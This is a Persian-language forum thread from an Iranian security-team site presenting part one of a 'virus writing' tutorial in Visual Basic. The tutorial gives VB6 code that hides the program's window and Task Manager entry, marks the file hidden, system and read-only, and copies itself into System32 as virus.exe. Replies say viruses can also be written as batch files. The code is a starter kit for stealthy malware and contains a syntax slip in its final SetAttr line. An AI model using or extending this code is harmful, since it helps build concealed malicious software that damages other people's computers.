رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

با سلام , تصمیم گرفتم تا در یک تاپیک آموزش ویروس نویسی ( حداقل در یکی از زبان ها ) آموزش ویروس نویسی در زبان ویژوال بیسیک رو خدمتون بدم

با نام خدا و مقدمه بخش اول رو شروع میکنم

ویروس ها فایل های مخفی ای هستند که پس از ورود به سیستم شروع به تخریب و یا انجام کاری که برایش تعریف شده میکند .

یکی از خاصیت های مهم ویروس مخفی بودن و دور از دسترس بودن است

ما در آموزش اول ابتدا سعی میکنیم تا این خاصیت رو بهش بدیم و برای دادن این خاصیت ها به ویروسمون از کد های :

Me.hide

App.TaskVisible = False
استفاده میکنیم

و اما کاربرد این کد ها چیه ؟

در اینجا کد Me.hide جلوی نمایش داده شدن فرم پس از اجرای فایل رو میگیره

App.TaskVisible هم برای نمایش دادن یا ندادن فایل توسط Task Manager در قسمت Application هست

که در صورت False بودن این مقدار , فایل ویروسی نمایش داده نخواهد شد

این دستورات را در قسمت Form‎_Load در ویژوال بیسیک می نویسند

به شکل زیر :

Private Sub Form_Load(‎‎)‎
Me.hide
App.TaskVisible = False
End sub
حالا میریم سراغ بخش پنهان سازی فایل

در اینجا با کد SetAttr مسیر جایی که ویروس قرار داره رو تعیین میکنیم

و شروع میکنیم به دادن یک سری خاصیت ها

مخفی سازی سیستمی

قرار دادن فایل در حالت ReadOnly و غیر قابل ویرایش

SetAttr "c:\virus.exe", khasiat ha ke ba dastore + dar kenare ham gharar migiran

c:\virus.exe ham ke masire viruseton hast



SetAttr "c:\virus.exe", vbHidden
تا اینجا vbHidden رو اضافه کردیم , برای اضافه کردن بقیه خاصیت ها از + استفاده میکنیم :

SetAttr "c:\virus.exe", vbHidden + vbSystem + vbReadOnly
در مرحله بعد میریم برای افزایش سطح دسترسی ویروس و ورود به پوشه System32 یا مسیری که میخواید ویروس اونجا ایجاد شه

ایجاد ویروسمون در پوشه سیستم 32

w$ = Environ("windir")
FileCopy App.Path + App.EXEName + ".exe", w$ + "\system32\" + "virus.exe"
خوب دوباره میریم در قسمت Form‎_Load تا کد هارو بنویسیم

Form_Load()
Me.Hide
App.TaskVisible = False
w$ = Environ("windir")
FileCopy App.Path + App.EXEName + ".exe", w$ + "\system32\" + "virus.exe"
SetAttr "c:\windows\system32\virus.exe" + vbHidden + vbSystem + vbReadOnly
End Sub
پایان بخش اول
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 2 هفته بعد...

با چ برنامه میشه ویروس نوشت ممنون میشم راهنمایی کنید

 

سلام عزیز.

همانظور که در تاپیک امده با نرم افزار ویژال بیسیک میتوان نوشت.با برنامه notepad هم میتوان نوشت با پسوند .bat و همچنین با بقیه زبان های برنامه نویسی.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

مهمان
این موضوع برای عدم ارسال قفل گردیده است.

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...